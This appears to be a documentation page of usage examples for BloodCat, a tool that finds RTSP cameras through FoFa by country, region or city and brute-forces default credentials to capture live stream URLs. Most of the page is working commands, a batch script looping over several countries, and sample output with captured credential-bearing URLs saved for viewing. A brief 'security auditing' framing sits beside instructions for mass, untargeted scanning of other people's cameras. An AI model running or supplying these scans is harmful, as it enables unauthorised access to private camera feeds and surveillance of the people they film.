Skip to main content

Overview

This page provides practical examples of using BloodCat for various scenarios, from scanning single cameras to discovering devices across entire regions.

Single IP Scanning

Scan a specific RTSP camera when you already know the target IP and port.

Basic Single Target Scan

python3 bloodcat.py --ip "80.191.192.230:554"
What happens:
1

Connection Test

BloodCat connects to the target and retrieves the RTSP banner to identify the camera vendor.
[+] Testing target: 80.191.192.230:554
[*] Authentication required detected, preparing to brute-force.
2

Vendor Detection

The tool analyzes the RTSP banner to determine the camera manufacturer:
[+] Hikvision detected
Supported vendors include:
  • Hikvision
  • Dahua
  • Uniview
  • Axis
  • Sony
  • Vivotek
  • Reolink
  • TVT
  • Milesight
3

Credential Brute-Force

BloodCat attempts common username/password combinations with vendor-specific RTSP paths:
Progress: 100%|████████████████████| 150/150 [00:45<00:00, 3.33combo/s]
4

Success & Save

If credentials are found, the RTSP URL is displayed and saved:
[+] Successfully obtained RTSP URL
[!] RTSP URL: rtsp://admin:[email protected]:554/Streaming/Channels/101

Custom Port Scanning

python3 bloodcat.py --ip "192.168.1.100:8554"
Scan a camera on a non-standard RTSP port (default is 554).

Local Network Scanning

python3 bloodcat.py --ip "10.0.0.50:554"
Scan cameras on your local network for security auditing.

Geographical Discovery

Discover and scan RTSP cameras using FoFa integration with geographical filters.

Country-Wide Discovery

Find all RTSP cameras in China: 
python3 bloodcat.py --country CN --key "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
Expected output: 
[*] Fetching network cameras in CN  
[+] Got data from Fofa...
[+] Starting information retrieval
[+] Testing target: 203.0.113.10:554
[+] Dahua detected
[*] Authentication required detected, preparing to brute-force.
Progress: 100%|████████████████████| 120/120 [00:38<00:00, 3.15combo/s]
[+] Successfully obtained RTSP URL
[!] RTSP URL: rtsp://admin:[email protected]:554/cam/realmonitor?channel=1&subtype=0
[+] Testing target: 203.0.113.25:554
[+] Hikvision detected
...

Region-Specific Discovery

Target cameras in Hong Kong: 
python3 bloodcat.py --country CN --region HK --key "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
This narrows the search to a specific region, reducing the number of targets.

City-Based Discovery

Find cameras in a specific city: 
python3 bloodcat.py --country US --city "Los Angeles" --key "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"

Combined Geographical Filters

Use multiple filters for precision: 
python3 bloodcat.py --country CN --region "Beijing" --city "Chaoyang" --key "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
The FoFa query uses OR logic for region and city, so cameras matching either criterion will be included.

Advanced Examples

Multiple Country Codes

Run separate commands for different countries: 
python3 bloodcat.py --country US --key "your-key"
python3 bloodcat.py --country GB --key "your-key"
python3 bloodcat.py --country JP --key "your-key"

Scripted Batch Scanning

Create a shell script for automated scanning: 
#!/bin/bash

API_KEY="your-fofa-api-key"

for COUNTRY in CN US GB DE FR JP; do
    echo "Scanning country: $COUNTRY"
    python3 bloodcat.py --country $COUNTRY --key $API_KEY
    sleep 10  # Rate limiting
done

Targeted Research

Scan specific regions for security research: 
# European Union regions
python3 bloodcat.py --country DE --region "Bavaria" --key "your-key"
python3 bloodcat.py --country FR --region "Île-de-France" --key "your-key"

# North American regions
python3 bloodcat.py --country US --region "California" --key "your-key"
python3 bloodcat.py --country US --region "Texas" --key "your-key"

Output and Results

Console Output

BloodCat provides real-time feedback during scanning: 
                  ;,_            ,
                 _uP~"b          d"u,
               dP'   "b       ,d"  "o
              d"    , `b     d"'    "b
             l] [    " `l,  d"       lb
...

Blood Cat
Maptnh@S-H4CK13                 https://github.com/MartinxMax

[*] Fetching network cameras in CN HK 
[+] Got data from Fofa...
[+] Starting information retrieval
[+] Testing target: 203.0.113.45:554
[+] Hikvision detected
[*] Authentication required detected, preparing to brute-force.
Progress: 100%|████████████████████| 150/150 [00:45<00:00, 3.33combo/s]
[+] Successfully obtained RTSP URL
[!] RTSP URL: rtsp://admin:[email protected]:554/Streaming/Channels/101

Saved Results

All successful discoveries are saved to ./data/ipcam.info: 
cat ./data/ipcam.info
Example content: 
rtsp://admin:[email protected]:554/Streaming/Channels/101
rtsp://root:[email protected]:554/cam/realmonitor?channel=1&subtype=0
rtsp://admin:[email protected]:554/live.sdp
rtsp://admin:[email protected]:554/h264Preview_01_main

Viewing Discovered Cameras

Use the provided viewer script: 
./play.sh
This launches a viewer interface to browse and watch discovered camera streams.

Understanding Scan Progress

Progress Bar Interpretation

Progress: 100%|████████████████████| 150/150 [00:45<00:00, 3.33combo/s]
  • 150/150 - Tested 150 credential/path combinations
  • [00:45<00:00] - Took 45 seconds, 0 seconds remaining
  • 3.33combo/s - Testing 3.33 combinations per second

Vendor-Specific Paths

BloodCat uses vendor-specific paths for efficient scanning: 
paths = [
    'Streaming/Channels/101', 
    'Streaming/Channels/102',  
    'live.sdp',
    'videoMain',
    'media/video1',
    'media/video2',
]
users = ['admin', 'root', 'supervisor']

Common Scenarios

Security Auditing

Audit your organization’s cameras: 
# Scan your IP range (modify for actual usage)
python3 bloodcat.py --ip "10.0.0.100:554"
python3 bloodcat.py --ip "10.0.0.101:554"
python3 bloodcat.py --ip "10.0.0.102:554"

Penetration Testing

Discover exposed cameras in target region: 
python3 bloodcat.py --country US --region "California" --city "San Francisco" --key "your-key"

Research and Analysis

Gather data on camera exposure by geography: 
# Collect regional statistics
python3 bloodcat.py --country CN --key "your-key" > results_cn.log
python3 bloodcat.py --country US --key "your-key" > results_us.log
python3 bloodcat.py --country GB --key "your-key" > results_gb.log

Tips for Effective Usage

Start Small

Test with single IPs before running large geographical queries.

Respect Rate Limits

FoFa API has rate limits. Space out queries or use delays in scripts.

Monitor Output

Watch console output for errors or detection issues during scans.

Verify Results

Always verify discovered URLs work before relying on them.

Troubleshooting

No Results Found

[!] Query error....
Possible causes:
  • Invalid FoFa API key
  • No cameras in specified region
  • API rate limit exceeded
  • Network connectivity issues
Solution: Verify your API key and try a broader geographical filter.

Skip Messages

[+] Testing target: 203.0.113.50:554
[...] Skip
Cause: Target is not responding on RTSP port or is unreachable.

No Successful Credentials

Progress: 100%|████████████████████| 150/150 [00:45<00:00, 3.33combo/s]
[+] Testing target: 203.0.113.75:554
Cause: None of the common credentials worked. The camera may use non-default credentials.

Next Steps

Command Reference

Complete CLI argument documentation

FoFa Integration

Deep dive into FoFa API usage

Camera Detection

Understand how brand detection works

Viewer

Learn to use the stream viewer

Build docs developers (and LLMs) love

Get started for freeTalk to us